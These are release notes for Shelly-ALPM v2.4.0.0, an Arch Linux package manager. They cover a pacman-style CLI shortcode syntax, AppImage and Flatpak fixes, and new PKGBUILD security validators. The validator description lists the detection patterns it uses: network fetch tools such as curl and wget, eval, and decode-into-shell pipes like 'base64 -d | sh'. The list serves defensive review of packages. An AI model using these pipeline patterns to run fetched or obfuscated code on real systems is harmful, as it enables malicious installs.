Skip to content
Seafoam Labs

Shelly Changelog

All versionsAll versions forwardView on GitHub

Version v2.4.0.0

Shelly-ALPM v2.4.0.0 Release Notes

This release centers on a major CLI refactor, maturing AppImage/Flatpak support, and a new layer of PKGBUILD security analysis.

On the safety side, Shelly now actively inspects install scriptlets for dynamic code execution and post_install risks β€” the new PostInstallValidator scans resolved scriptlets for risky network/code-fetching tools (npm, npx, bun, pip, curl, wget, etc.) and flags dynamic command construction that can’t be statically reviewed, including command substitution ($(...), backticks), eval, ${!var} indirection, and decode-into-shell pipelines (e.g. base64 -d | sh). It even performs lightweight de-obfuscation (collapsing tricks like b''u''n, cur\l, and n"p"m) so deliberately hidden tool names are caught and escalated to Critical as a sign of malicious intent. Complementing this, the new HomographValidator defends against homograph/IDN spoofing in attacker-controlled fields (package names, dependencies, URLs, and AUR metadata) by detecting zero-width/bidi/control characters, mixed-script tokens (e.g. Latin mixed with Cyrillic/Greek), fullwidth/compatibility forms, and confusable β€œskeletons” that map look-alike Unicode onto ASCII (e.g. Cyrillic Π° β†’ a). Findings surface through the same PkgbuildReviewDialog security-status path so users can review them before installing.

Rounding out the CLI work, this release ships a pacman-style shortcode interface: a compact -<Type><Action><modifiers> syntax that translates familiar single-letter operations into Shelly’s full command surface, making the CLI feel native to anyone coming from pacman/yay.

πŸ”‘ Shortcode Examples

The first argument may be a shortcode of the form -<Type><Action>[modifiers], where the Type selects a domain (S = system/repo, A = AUR, F = Flatpak, I = AppImage, C = config, K = keyring, U = utility) and the Action/modifiers map to a verb and flags:

Terminal window
shelly -SIu firefox     # install firefox -u   (sync install, with upgrade)
shelly -SQad            # query -a -d          (query available, fetch details of exact match)
shelly -SRcr pkg        # remove pkg -c -r     (cascade + config removal) : The equivalent of `sudo pacman -Rns pkg`
shelly -AS ripgrep      # aur search zen-browser-bin
shelly -AI yay-bin      # aur install zen-browser-bin
shelly -FR org.app.Id   # flatpak uninstall org.app.Id
shelly -KV ABCD1234     # keyring recv ABCD1234
shelly -UC              # cache-clean

Invalid combinations are rejected with helpful errors (e.g. an unknown action lists valid actions for that type, and an unknown modifier lists the allowed modifiers), and in shortcode mode --ui-mode is used in place of -U.

✨ Highlights

  • New CLI Release with a substantial refactor and modernized command surface (#1059, #1103).
  • AppImage support maturing: updates now shown in the UI, eventing improvements, and fixes to desktop-entry handling (#1053, #1058, #1075, #1087, #1092).
  • Security additions: PKGBUILD review now shows security status, flags dynamic/post_install code execution, and detects potential homograph spoofing (#1099, #1100).
  • doas support added as an alternative privilege-elevation backend (#1078).

πŸš€ Features

  • Add doas support (#1078)
  • Add manual language selection in settings (#1056) β€” thanks @nyx1d
  • Add docs command, with printed command options and default cascade enabled (#1084, #1097)
  • Add Zsh completions for the Shelly CLI (#1090)
  • Show AppImage updates in the UI (#1058)
  • Add new version column to AUR update view (#1047)
  • Add maintainer and last-updated columns to AUR search output (#1071)
  • Add security status to PkgbuildReviewDialog (#1099)
  • Add HomographValidator to flag homograph spoofing in PKGBUILDs (#1100)

πŸ›  Improvements & Refactors

  • CLI refactor (#1059) and new CLI release (#1103)
  • Refactor CredentialManager and add ProcessExecutor service (#1066)
  • Convert PerformDownload to async and refactor call sites (#1079)
  • Skip provider selection when only one distinct option is available (#1070)
  • Replace --elevated flag in UpgradeAll with a UserIdentity-based approach (#1093, #1094)
  • Refactor question handling to remove obsolete ALPM-specific protocols (#1091)
  • Update file-size display to Megabytes and refactor progress-bar logic (#1082)
  • Simplify query (#1076) and remove the explore alias from query (#1085)
  • AppImage eventing and CLI output updates from the manager (#1087, #1092)
  • Flatpak output and UI element updates (#1049, #1080)
  • General small UI adjustments (#1046)
  • Remove unused config options and delete unused/unwanted code (#1081, #1086)

🐞 Bug Fixes

  • Fix AppImages creating an additional desktop entry (#1053)
  • Fix Flatpak upgrade bug and remote selection (#1054)
  • Fix Flatpak scrolling issue (#1061)
  • Various AppImage fixes (#1075)

🌐 Localization

  • Update de-DE.po (#1089) β€” thanks @Henry2o1o

πŸ“¦ Maintenance / Versioning

  • Merge Dev into master and master back-merge (#1040, #1041)
  • Update UI elements in Flatpak (#1049)
  • Bump version to 2.3.3.5 across all projects and PKGBUILD files (#1101)
  • Bump version to 2.4.0.0 across all projects and PKGBUILD files (#1102)

Contributors to Shelly-ALPM v2.4.0.0

  • @caroberrie β€” #1040, #1041, #1046, #1049, #1053, #1054, #1058, #1061, #1075, #1080, #1081, #1086, #1087, #1092
  • @ZoeyErinBauer β€” #1059, #1070, #1071, #1076, #1078, #1079, #1082, #1090, #1091, #1093, #1094, #1100, #1101, #1102, #1103
  • @azdanov β€” #1066, #1084, #1085, #1097, #1099
  • @Terrabade β€” #1047
  • @nyx1d β€” #1056 (first contribution πŸŽ‰)
  • @Henry2o1o β€” #1089

πŸ‘‹ New Contributors

  • @nyx1d made their first contribution in #1056

Full Changelog: https://github.com/Seafoam-Labs/Shelly-ALPM/compare/v2.3.3.4...v2.4.0.0

Β© 2026 Seafoam LabsShelly Chel